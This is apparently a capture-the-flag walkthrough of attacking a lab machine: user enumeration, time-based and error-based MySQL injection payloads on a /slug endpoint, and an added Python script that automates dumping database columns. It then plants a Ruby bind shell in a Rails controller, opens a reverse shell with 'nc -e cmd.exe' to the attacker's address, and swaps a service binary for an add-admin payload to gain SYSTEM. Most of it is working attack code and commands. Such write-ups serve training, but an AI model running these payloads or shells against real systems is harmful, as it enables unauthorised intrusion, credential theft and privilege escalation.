nmapAutomator.sh -H 192.168.237.127 -t full
nmapAutomator.sh -H 192.168.237.127 -t vulns
wget -r ftp://<user>@192.168.237.127:30021
With the username christopher, we get "The password reminder doesn't match the records", which is different from the response for other users, "The user does not exist". So christopher is a valid user.
The application also exposes a /users path. Trying http://192.168.237.127:33033/users/christopher gives an error traceback. /users takes 4 request methods.
The URL parameter of /slug is injectable. A time-based probe confirms it:
http://192.168.237.127:33033/slug?URL=%27%20UNION%20SELECT%20IF(1=2,%20SLEEP(5),%20null)--%20-
The IF conditional makes the server sleep for 5 seconds if the condition is true, and respond immediately otherwise, so any boolean condition can be tested one request at a time.
Faster is error-based extraction: the output of SELECT username FROM users LIMIT 0,1 gets reflected in the MySQL error. The COUNT(*) ... GROUP BY FLOOR(rand(0)*2) construct makes MySQL insert a duplicate key into its temporary GROUP BY table, and the key value, which contains the subquery output prefixed with 0x3a (':'), is quoted back in the "Duplicate entry" error:
http://192.168.237.127:33033/slug?URL=%27%20AND%201=%20(SELECT%201%20FROM(SELECT%20COUNT(*),concat(0x3a,(SELECT%20username%20FROM%20users%20LIMIT%200,1),FLOOR(rand(0)*2))x%20FROM%20information_schema.TABLES%20GROUP%20BY%20x)a)--%20-
evren.eagan is the first username. Repeating with SELECT reminder FROM USERS LIMIT 0,1, we see the reminder, 4qpdR87QYjRbog.
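The two injection primitives above, the time-based IF/SLEEP oracle and the error-based FLOOR(rand(0)*2) duplicate-key leak, wrapped in a small script that builds the payloads, encodes them for the /slug?URL= parameter and pulls the leaked value out of the MySQL error. This is an added example, not code from the original writeup; BASE_URL is the target from the writeup, while SAMPLE_ERROR and canned_fetch are constructed stand-ins for the server so the script runs offline. Point fetch at a real HTTP client to use it against the box.

```python
"""Helpers for the MySQL injection primitives used against /slug?URL= above.

Added example, not code from the original writeup. BASE_URL is the target
from the writeup; SAMPLE_ERROR and canned_fetch are constructed stand-ins
for the real server so everything below runs offline.
"""
import re
import time
from urllib.parse import quote

BASE_URL = "http://192.168.237.127:33033/slug?URL="


def time_probe(condition: str, seconds: int = 5) -> str:
    """Time-based oracle: the response is delayed by `seconds` iff `condition` is true."""
    return f"' UNION SELECT IF({condition}, SLEEP({seconds}), null)-- -"


def error_leak(subquery: str) -> str:
    """Error-based leak. COUNT(*) ... GROUP BY FLOOR(rand(0)*2) makes MySQL insert a
    duplicate key into its temporary GROUP BY table; the key, which is the subquery
    output prefixed with 0x3a (':'), is quoted in the 'Duplicate entry' error."""
    return (
        "' AND 1= (SELECT 1 FROM(SELECT COUNT(*),"
        f"concat(0x3a,({subquery}),FLOOR(rand(0)*2))x "
        "FROM information_schema.TABLES GROUP BY x)a)-- -"
    )


def row_query(column: str, table: str, row: int) -> str:
    """Subquery for one cell: LIMIT row,1 so exactly one value is concatenated."""
    return f"SELECT {column} FROM {table} LIMIT {row},1"


def to_url(payload: str) -> str:
    """Percent-encode the whole payload; the server decodes it back verbatim."""
    return BASE_URL + quote(payload, safe="")


_DUP_RE = re.compile(r"Duplicate entry '(.*?)' for key")


def parse_leak(body: str):
    """Return the leaked value from a MySQL duplicate-key error, or None if absent.
    The entry looks like ':evren.eagan1': our ':' separator, the value, and the
    0/1 produced by FLOOR(rand(0)*2)."""
    m = _DUP_RE.search(body)
    if not m:
        return None
    entry = m.group(1)
    if entry.startswith(":") and entry[-1:] in ("0", "1"):
        return entry[1:-1]
    return None


def is_true(condition: str, fetch, seconds: int = 5) -> bool:
    """Evaluate `condition` through the time oracle. `fetch(url) -> str` does the request."""
    start = time.monotonic()
    fetch(to_url(time_probe(condition, seconds)))
    return time.monotonic() - start >= seconds - 0.5


def dump_column(column: str, table: str, fetch, max_rows: int = 50) -> list:
    """Walk a column one row at a time until the error stops leaking a value."""
    values = []
    for row in range(max_rows):
        leaked = parse_leak(fetch(to_url(error_leak(row_query(column, table, row)))))
        if leaked is None:
            break
        values.append(leaked)
    return values


# Constructed sample of a Rails error page quoting the MySQL error (not real output).
SAMPLE_ERROR = (
    "Mysql2::Error: Duplicate entry ':evren.eagan1' for key 'group_key': "
    "SELECT * FROM slugs WHERE url = ''"
)


def canned_fetch(url: str) -> str:
    """Offline stand-in for the target: a users table holding a single row."""
    if quote("LIMIT 0,1", safe="") in url:
        return SAMPLE_ERROR
    return "<html>no such slug</html>"


if __name__ == "__main__":
    print(to_url(time_probe("1=2")))
    print(dump_column("username", "users", canned_fetch))
```

dump_column stops at the first row that produces no "Duplicate entry" string, which is how you know the LIMIT has run past the end of the table; swap in dump_column("reminder", "users", fetch) to pull the reminders the same way.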
users_controller.rb handles HTTP requests related to the /user path. We edit its PATCH/PUT handler to include this bind shell payload: https://github.com/secjohn/ruby-shells/blob/master/shell.rb
With the modified users_controller.rb in place, submitting the "Update User" form triggers the handler and we can connect to the bind shell.
Next we copy nc.exe from our SMB share and run it:
copy \\192.168.49.237\ROPNOP\nc.exe .
nc -e cmd.exe 192.168.49.237 139
We find bdctl.exe, an executable from the BarracudaDrive program. In the C:\bd directory there is a readme.txt which shows the changelog.
Compile addAdmin.c into a replacement bd.exe:
i686-w64-mingw32-gcc addAdmin.c -o bd.exe
Rename the original bd.exe:
move bd.exe bd.service.exe
Copy in our bd.exe:
copy \\192.168.49.237\ROPNOP\bd.exe .
Reboot with shutdown /r so the BarracudaDrive service starts our binary. We should be able to catch a shell as SYSTEM: